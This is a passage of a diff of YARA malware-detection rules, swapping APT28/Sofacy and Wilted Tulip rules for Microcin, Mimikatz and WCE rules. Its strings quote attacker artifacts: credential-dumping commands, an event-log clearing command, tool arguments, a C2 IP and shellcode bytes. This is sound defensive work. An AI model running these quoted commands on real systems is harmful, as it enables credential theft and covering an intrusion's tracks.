-		$x46 = { 6A 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x47 = { 6A 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x48 = { 6A 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x49 = { 6A 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x50 = { 6A 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x51 = { 6A 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x52 = { 6A 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x53 = { 6A 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x54 = { 6A 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x55 = { 6A 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x56 = { 64 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x57 = { 6A 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x58 = { 6A 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x59 = { 6A 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x60 = { 6A 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x61 = { 64 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x62 = { 64 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x63 = { 64 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x64 = { 64 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$s2 = "[Pause]" fullword ascii
+		$s7 = "IconCache_%02d%02d%02d%02d%02d" fullword ascii
 
 	condition:
-		filesize > 50KB and filesize < 200KB and ( $s0 and 1 of ( $x* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT28_Hospitalitymalware_Document : FILE
+rule SIGNATURE_BASE_Microcin_Sample_3 : FILE
 {
 	meta:
-		description = "Yara Rule for APT28_Hospitality_Malware document identification"
-		author = "CSE CybSec Enterprise - Z-Lab"
-		id = "722e80ef-d729-5887-9853-cd06128f506d"
-		date = "2017-10-02"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "daecdfe3-e78c-55ee-83a3-3cee8cb9bb5f"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_hospitality.yar#L3-L18"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L54-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "33c69e03e00c90dc0b673cdb042f8f979552086414bda9c9f17f3785214b05af"
+		logic_hash = "bf1227460f1fc4a7bede853b0d4f15b520db870ac7ce2e6684dc195ea6322e82"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4f74a3b67c5ed6f38f08786f1601214412249fe128f12c51525135710d681e1d"
 
 	strings:
-		$a = {75 52 B9 ED 1B D6 83 0F DB 24 CA 87 4F 5F 25 36 BF 66 BA}
-		$b = {EC 3B 6D 74 5B C5 95 F3 9E 24 5B FE 4A 64 C7 09 CE 07 C9 58 4E 62 3B}
+		$x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii
+		$s2 = "test, Version 1.0" fullword wide
 
 	condition:
-		all of them and filesize > 75KB and filesize < 82KB
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-
-rule SIGNATURE_BASE_APT28_Hospitalitymalware_Mvtband_File
+rule SIGNATURE_BASE_Microcin_Sample_4 : FILE
 {
 	meta:
-		description = "Yara Rule for mvtband.dll malware"
-		author = "CSE CybSec Enterprise - Z-Lab"
-		id = "f9e34c77-38b3-513e-bb29-148ac7058596"
-		date = "2017-10-02"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8a6a0735-422a-5e91-9274-ce55f7bee5d3"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_hospitality.yar#L20-L33"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L70-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5da333444e7c9f023d9c6d8d1dec617859efdb26f9f6bc41e22ef27d2e3059a"
+		logic_hash = "1293fbd1a6b440168bb1d7b250df0c8a1a7f99a7fb603a6abec7fe7ba20cf4f5"
 		score = 75
 		quality = 85
-		tags = ""
-		tlp = "white"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "92c01d5af922bdaacb6b0b2dfbe29e5cc58c45cbee5133932a499561dab616b8"
 
 	strings:
-		$a = "DGMNOEP"
-		$b = {C7 45 94 0A 25 73 30 8D 45 94}
+		$s1 = "cmd /c dir /a /s \"%s\" > \"%s\"" fullword wide
+		$s2 = "ini.dat" fullword wide
+		$s3 = "winupdata" fullword wide
+		$f1 = "%s\\(%08x%08x)%s" fullword wide
+		$f2 = "%s\\d%08x\\d%08x.db" fullword wide
+		$f3 = "%s\\u%08x\\u%08x.db" fullword wide
+		$f4 = "%s\\h%08x\\h%08x.db" fullword wide
 
 	condition:
-		all of them and pe.sections [ 2 ] . raw_data_size == 0
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or 5 of them )
 }
-rule SIGNATURE_BASE_Rottenpotato_Potato : FILE
+rule SIGNATURE_BASE_Microcin_Sample_5 : FILE
 {
 	meta:
-		description = "Detects a component of privilege escalation tool Rotten Potato - file Potato.exe"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4a12783c-f58a-518b-a80a-f09f146304cc"
-		date = "2017-02-07"
-		modified = "2022-12-21"
-		reference = "https://github.com/foxglovesec/RottenPotato"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rottenpotato.yar#L10-L34"
+		id = "cd06f9f7-0ba3-52c9-a814-be1cd53e2e42"
+		date = "2017-09-26"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L92-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79d2dfd5c2cfd12301c1924dce2ca2a2c3cc070565671c3e0cd69123d2245b1c"
-		score = 90
+		logic_hash = "18b9b80ad3c27f32c71197f33e5e99742662cf5cf4ed5f83d574d44ba63f8b5f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59cdbb21d9e487ca82748168682f1f7af3c5f2b8daee3a09544dd58cbf51b0d5"
+		hash1 = "b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e"
 
 	strings:
-		$x1 = "Potato.exe -ip <ip>" fullword wide
-		$x2 = "-enable_httpserver true -enable_spoof true" fullword wide
-		$x3 = "/C schtasks.exe /Create /TN omg /TR" fullword wide
-		$x4 = "-enable_token true -enable_dce true" fullword wide
-		$x5 = "DNS lookup succeeds - UDP Exhaustion failed!" fullword wide
-		$x6 = "DNS lookup fails - UDP Exhaustion worked!" fullword wide
-		$x7 = "\\obj\\Release\\Potato.pdb" ascii
-		$x8 = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";" fullword wide
-		$s1 = "\"C:\\Windows\\System32\\cmd.exe\" /K start" fullword wide
+		$x1 = "Sorry, you are not fortuante ^_^, Please try other password dictionary " fullword ascii
+		$x2 = "DomCrack <IP> <UserName> <Password_Dic file path> <option>" fullword ascii
+		$x3 = "The password is \"%s\"         Time: %d(s)" fullword ascii
+		$x4 = "The password is \" %s \"         Time: %d(s)" fullword ascii
+		$x5 = "No password found!" fullword ascii
+		$x7 = "Can not found the Password Dictoonary file! " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_Apt_Sofacy_Xtunnel : FILE
+rule SIGNATURE_BASE_Microcin_Sample_6 : FILE
 {
 	meta:
-		description = "Sofacy Malware - German Bundestag"
-		author = "Claudio Guarnieri"
-		id = "aef091b5-cedf-5443-ab61-8b2dbc7e77fd"
-		date = "2023-12-05"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9988723f-a7ca-598f-9a6c-9f3915732117"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L3-L24"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L112-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2478d9d8996bf4a142e39eac0e2d6af718d364be080a89530812615595777efd"
+		logic_hash = "280fb17b5ed5ff1c8018e426969f75e18589eabeb2a20e0e623f206e72e8958d"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cbd43e70dc55e94140099722d7b91b07a3997722d4a539ecc4015f37ea14a26e"
+		hash2 = "871ab24fd6ae15783dd9df5010d794b6121c4316b11f30a55f23ba37eef4b87a"
 
 	strings:
-		$xaps = ":\\PROJECT\\XAPS_"
-		$variant11 = "XAPS_OBJECTIVE.dll"
-		$variant12 = "start"
-		$variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
-		$variant22 = "is you live?"
-		$mix1 = "176.31.112.10"
-		$mix2 = "error in select, errno %d"
-		$mix3 = "no msg"
-		$mix4 = "is you live?"
-		$mix5 = "127.0.0.1"
-		$mix6 = "err %d"
-		$mix7 = "i`m wait"
-		$mix8 = "hello"
-		$mix9 = "OpenSSL 1.0.1e 11 Feb 2013"
-		$mix10 = "Xtunnel.exe"
+		$s1 = "** ERROR ** %s: %s" fullword ascii
+		$s2 = "TEMPDATA" fullword wide
+		$s3 = "Bruntime error " fullword wide
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0xCFD0 ) ) and ( ( $xaps ) or ( all of ( $variant1* ) ) or ( all of ( $variant2* ) ) or ( 6 of ( $mix* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
 }
-
-rule SIGNATURE_BASE_Winexe_Remoteexec : FILE
+rule SIGNATURE_BASE_Mimikatz_Memory_Rule_1 : APT
 {
 	meta:
-		description = "Winexe tool for remote execution (also used by Sofacy group)"
-		author = "Florian Roth (Nextron Systems), Robert Simmons"
-		id = "5079557a-0461-5b04-b0f2-4265bf7ec041"
-		date = "2015-06-19"
-		modified = "2021-02-11"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L26-L48"
+		description = "Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)"
+		author = "Florian Roth"
+		id = "55cc7129-5ea0-5545-a8f6-b5306a014dd0"
+		date = "2014-12-22"
+		modified = "2023-07-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L5-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9e944f07b43b934346c0e88685014c05ff81561ac2f7c3374b55b9c4523b98c1"
+		logic_hash = "22064af570b8e0a93ca0d45484848eda3fbecfd27c88247ef0897fe53be4b7fc"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
-		hash2 = "d19dfdbe747e090c5aa2a70cc10d081ac1aa88f360c3f378288a3651632c4429"
+		tags = "APT"
+		nodeepdive = 1
 
 	strings:
-		$s1 = "error Cannot LogonUser(%s,%s,%s) %d" ascii fullword
-		$s2 = "error Cannot ImpersonateNamedPipeClient %d" ascii fullword
-		$s3 = "\\\\.\\pipe\\ahexec" fullword ascii
-		$s4 = "\\\\.\\pipe\\wmcex" fullword ascii
-		$s5 = "implevel" fullword ascii
+		$s1 = "sekurlsa::wdigest" fullword ascii
+		$s2 = "sekurlsa::logonPasswords" fullword ascii
+		$s3 = "sekurlsa::minidump" fullword ascii
+		$s4 = "sekurlsa::credman" fullword ascii
+		$fp1 = "\"x_mitre_version\": " ascii
+		$fp2 = "{\"type\":\"bundle\","
+		$fp3 = "use strict" ascii fullword
+		$fp4 = "\"url\":\"https://attack.mitre.org/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 115KB and ( 3 of them or pe.imphash ( ) == "2f8a475933ac82b8e09eaf26b396b54d" )
+		1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Sofacy_Mal2 : FILE
+rule SIGNATURE_BASE_Mimikatz : FILE
 {
 	meta:
-		description = "Sofacy Group Malware Sample 2"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1547cc67-7d7c-5ec9-816c-15b7d523376a"
-		date = "2015-06-19"
+		description = "mimikatz"
+		author = "Benjamin DELPY (gentilkiwi)"
+		id = "840a5b8c-a311-50bc-a099-6b8ab1492e12"
+		date = "2022-11-16"
 		modified = "2023-12-05"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L50-L67"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L48-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
-		logic_hash = "c325ed815b7de3338363d064f4097edf0596644d4ef8d642fda3664a2a16c2eb"
-		score = 70
+		logic_hash = "bf972a2c0465c3bbdde6f03d91c6f479d0f66c6d3e9512355de5a973164b56a5"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tool_author = "Benjamin DELPY (gentilkiwi)"
 
 	strings:
-		$x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
-		$x2 = "XAPS_OBJECTIVE.dll" fullword ascii
-		$s1 = "i`m wait" fullword ascii
+		$exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd }
+		$exe_x86_2 = { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 }
+		$exe_x64_1 = { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74}
+		$exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
+		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
+		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) and $s1
+		( all of ( $exe_x86_* ) ) or ( all of ( $exe_x64_* ) ) or ( any of ( $sys_* ) )
 }
-rule SIGNATURE_BASE_Sofacy_Mal3 : FILE
+rule SIGNATURE_BASE_Wce
 {
 	meta:
-		description = "Sofacy Group Malware Sample 3"
-		author = "Florian Roth (Nextron Systems)"
-		id = "67d002ef-4ed9-54ce-a6ef-49b7f3b951e2"
-		date = "2015-06-19"
-		modified = "2023-01-06"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L69-L99"
+		description = "wce"
+		author = "Benjamin DELPY (gentilkiwi)"
+		id = "857981ee-3f57-580b-8bfd-8d2109298e27"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L76-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
-		logic_hash = "80c433cf5b3d042e46b5441a1b027c5ecf571f30571064904a33e92677633e66"
-		score = 70
+		logic_hash = "a16db99dcaaf1b6c33a738aab4f4d3812366258bc2f6dd32250ee1b1a0616f1c"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		tool_author = "Hernan Ochoa (hernano)"
 
 	strings:
-		$s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii
-		$s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii
-		$s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii
-		$s4 = "<font size=4 color=red>process is exist</font>" fullword ascii
-		$s5 = ".winnt.check-fix.com" ascii
-		$s6 = ".update.adobeincorp.com" ascii
-		$s7 = ".microsoft.checkwinframe.com" ascii
-		$s8 = "adobeincorp.com" fullword wide
-		$s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii
-		$x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
-		$x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
-		$x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }
+		$hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }
+		$hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $s* ) or ( 1 of ( $s* ) and all of ( $x* ) ) )
+		any of them
 }
-rule SIGNATURE_BASE_Sofacy_Bundestag_Batch : FILE
+rule SIGNATURE_BASE_Power_Pe_Injection
 {
 	meta:
-		description = "Sofacy Bundestags APT Batch Script"
+		description = "PowerShell with PE Reflective Injection"
+		author = "Benjamin DELPY (gentilkiwi)"
+		id = "a71fe9f2-9c2a-5650-a5c7-116b76f10db6"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L91-L101"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "64a7033d51e8933912f37ce68bffc216073a88cae1ea7492e71a812411ae6a9d"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$str_loadlib = "0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9"
+
+	condition:
+		$str_loadlib
+}
+rule SIGNATURE_BASE_Mimikatz_Logfile
+{
+	meta:
+		description = "Detects a log file generated by malicious hack tool mimikatz"
 		author = "Florian Roth (Nextron Systems)"
-		id = "869dafec-1387-5640-b608-b84cf0d43342"
-		date = "2015-06-19"
+		id = "921d85fc-fb4d-57ed-b4ac-203d5c6f1e8e"
+		date = "2015-03-31"
 		modified = "2023-12-05"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L101-L116"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L103-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "05d6df161042a65f9eeec4be4046001a03fa61747a9ea123f13e6e75d6664ac7"
-		score = 70
+		logic_hash = "4591cda5bd5a555292087da26193accc4f00d7c0611be8d5ab6dd4dabb14a0ef"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx)" ascii
-		$s2 = "cmd /c copy"
-		$s3 = "forfiles"
+		$s1 = "SID               :" ascii fullword
+		$s2 = "* NTLM     :" ascii fullword
+		$s3 = "Authentication Id :" ascii fullword
+		$s4 = "wdigest :" ascii fullword
 
 	condition:
-		filesize < 10KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Tools_Back : FILE
+
+rule SIGNATURE_BASE_Mimikatz_Strings : FILE
 {
 	meta:
-		description = "Detects Chrome password dumper used in Operation Wilted Tulip"
+		description = "Detects Mimikatz strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f57bd66-b269-5f59-ade1-f881b1d7dadd"
-		date = "2017-07-23"
-		modified = "2022-12-21"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L13-L29"
+		id = "d8f63b71-c66c-5c10-9268-2d8970f7c8a1"
+		date = "2016-06-08"
+		modified = "2023-12-05"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L121-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a23491cbb24177c027695d8f677c4a72ed0404c4c38356eec4b92f2d06be2ee"
-		score = 75
+		logic_hash = "baba1e159c0fb23f68b80459291a2d2c52e84f742f51ca30b894f7fc6282ad7a"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b7faeaa6163e05ad33b310a8fdc696ccf1660c425fa2a962c3909eada5f2c265"
 
 	strings:
-		$x1 = "%s.exe -f \"C:\\Users\\Admin\\Google\\Chrome\\TestProfile\" -o \"c:\\passlist.txt\"" fullword ascii
-		$x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" ascii
-		$x3 = "//Dump Chrome Passwords to a Output file \"c:\\passlist.txt\"" fullword ascii
+		$x1 = "sekurlsa::logonpasswords" fullword wide ascii
+		$x2 = "List tickets in MIT/Heimdall ccache" fullword ascii wide
+		$x3 = "kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage %08x" fullword ascii wide
+		$x4 = "* Injecting ticket :" fullword wide ascii
+		$x5 = "mimidrv.sys" fullword wide ascii
+		$x6 = "Lists LM & NTLM credentials" fullword wide ascii
+		$x7 = "\\_ kerberos -" wide ascii
+		$x8 = "* unknow   :" fullword wide ascii
+		$x9 = "\\_ *Password replace ->" wide ascii
+		$x10 = "KIWI_MSV1_0_PRIMARY_CREDENTIALS KO" ascii wide
+		$x11 = "\\\\.\\mimidrv" wide ascii
+		$x12 = "Switch to MINIDUMP :" fullword wide ascii
+		$x13 = "[masterkey] with password: %s (%s user)" fullword wide
+		$x14 = "Clear screen (doesn't work with redirections, like PsExec)" fullword wide
+		$x15 = "** Session key is NULL! It means allowtgtsessionkey is not set to 1 **" fullword wide
+		$x16 = "[masterkey] with DPAPI_SYSTEM (machine, then user): " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		(( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 3 of them ) ) and not pe.imphash ( ) == "77eaeca738dd89410a432c6bd6459907"
 }
-rule SIGNATURE_BASE_Wiltedtulip_Tools_Clrlg : FILE
+rule SIGNATURE_BASE_Appinithook : FILE
 {
 	meta:
-		description = "Detects Windows eventlog cleaner used in Operation Wilted Tulip - file clrlg.bat"
+		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6957c97d-2c2d-50ac-8fd5-2f299fc7b5c8"
-		date = "2017-07-23"
+		id = "73713011-3083-5cdf-b59c-f4da67d2d2ab"
+		date = "2015-07-15"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L31-L45"
+		reference = "https://goo.gl/Z292v6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L156-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "003f711ac6f2308f2bdc638da7c654686e7402db7b3837120168e5a99b774537"
-		score = 75
+		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
+		logic_hash = "a4de3a062e309715c339a45a16a7ff8f9a55851cb41097a6925fd11f649547d2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf"
 
 	strings:
-		$s1 = "('wevtutil.exe el') DO (call :do_clear" fullword ascii
-		$s2 = "wevtutil.exe cl %1" fullword ascii
+		$s0 = "\\Release\\AppInitHook.pdb" ascii
+		$s1 = "AppInitHook.dll" fullword ascii
+		$s2 = "mimikatz.exe" fullword wide
+		$s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide
+		$s4 = "mhook\\disasm-lib\\disasm.c" fullword wide
+		$s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide
+		$s6 = "VoidFunc" fullword ascii
 
 	condition:
-		filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Powershell
+rule SIGNATURE_BASE_HKTL_Mimikatz_Skeletonkey_In_Memory_Aug20_1
 {
 	meta:
-		description = "Detects powershell script used in Operation Wilted Tulip"
+		description = "Detects Mimikatz SkeletonKey in Memory"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6246508-a6ff-5a02-a0de-9cde139f0acc"
